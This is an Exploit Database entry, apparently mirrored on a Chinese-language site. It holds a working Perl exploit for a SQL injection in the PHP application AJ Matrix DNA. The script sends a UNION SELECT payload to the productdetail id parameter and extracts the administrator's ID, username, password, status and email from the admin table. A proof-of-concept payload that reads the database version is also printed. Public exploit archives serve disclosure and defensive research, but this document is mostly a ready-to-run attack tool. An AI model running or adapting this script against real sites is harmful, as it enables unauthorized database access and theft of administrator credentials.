AJ Matrix DNA – SQL Injection

• Exploit Database
• 13 阅读

• 作者： Br0ly
  日期： 2010-12-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15718/

• #!/usr/bin/perl
  #|------------------------------------------------------------------------------------------------------------------
  #| -Info:
  # 
  #| -Name: AJ Matrix DNA
  #| -Site: http://www.ajsquare.com/ajhome.php
  #| -Bug: Sql Injection
  #| -Found: by Br0ly
  #| -BRAZIL >D
  #| -Contact: br0ly[dot]Code[at]gmail[dot]com
  #|
  #| -Gretz: Osirys , Out0fBound
  #|
  #| -p0c:
  #| -SQL INJECTION: 
  #|
  #| -9999+union+all+select+0,1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15--
  #|
  #|--------------------------------------
  #|-AJ Matrix DNA		 
  #| -Sql Injection 
  #| -by Br0ly
  #|--------------------------------------
  #|
  #|
  #|
  #|
  #| >D, And sorry for my bad english ;/
  #|
  #|
  
  use IO::Socket::INET;
  use LWP::UserAgent;
  
   my $host= $ARGV[0];
   my $sql_path = "/index.php?do=productdetail&id=";
  
  
  if (@ARGV < 1) {
  &banner();
  &help("-1");
  }
  
  elsif(cheek($host) == 1) {
  	&banner();
  	&xploit($host,$sql_path);
  }
  
  else {
  &banner();
  help("-2");
  }
  
  sub xploit() {
  
  my $host = $_[0];
  my $sql_path = $_[1];
  
  print "[+] Getting the id,login,pass,status of the admin.\n";
  
  my $sql_atk = $host.$sql_path."-9999+union+all+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(0x6272306c79,0x3a,admin_id,0x3a,admin_username,0x3a,admin_password,0x3a,admin_status,0x3a,admin_email,0x3a,0x6272306c79)+from+ajmatrix_admin_table--";
  my $sql_get = get_url($sql_atk);
  my $connect = tag($sql_get); 
  
  if($connect =~ /br0ly:(.+):(.+):(.+):(.+):(.+):br0ly/) {
  	print "[+] ID = $1\n";
  	print "[+] User = $2\n";
  	print "[+] Pass = $3\n";
  	print "[+] Status = $4\n";
  	print "[+] Email= $5\n";
  	exit(0);
  }
  else {
  	print "[-] Exploit, Fail\n";
  	exit(0);
  
  }
   }
  
   sub get_url() {
  $link = $_[0];
  my $req = HTTP::Request->new(GET => $link);
  my $ua = LWP::UserAgent->new();
  $ua->timeout(4);
  my $response = $ua->request($req);
  return $response->content;
  }
  
  sub tag() {
  my $string = $_[0];
  $string =~ s/ /\$/g;
  $string =~ s/\s/\*/g;
  return($string);
  }
  
  sub cheek() {
  my $host= $_[0];
  if ($host =~ /http:\/\/(.*)/) {
  return 1;
  }
  else {
  return 0;
  }
  }
  
  sub help() {
  
  my $error = $_[0];
  if ($error == -1) {
  print "\n[-] Error, missed some arguments !\n\n";
  }
  
  elsif ($error == -2) {
  
  print "\n[-] Error, Bad arguments !\n";
  }
  
  print "[*] Usage : perl $0 http://localhost/ajmatrixdna/\n\n";
  print "Ex: perl $0 http://localhost/ajmatrixdna/\n\n";
  exit(0);
  }
  
  sub banner {
  print "\n".
  "--------------------------------------\n".
  " -AJ Matrix DNA		 \n".
  " -Sql Injection \n".
  " -by Br0ly\n".
  "--------------------------------------\n\n";
  }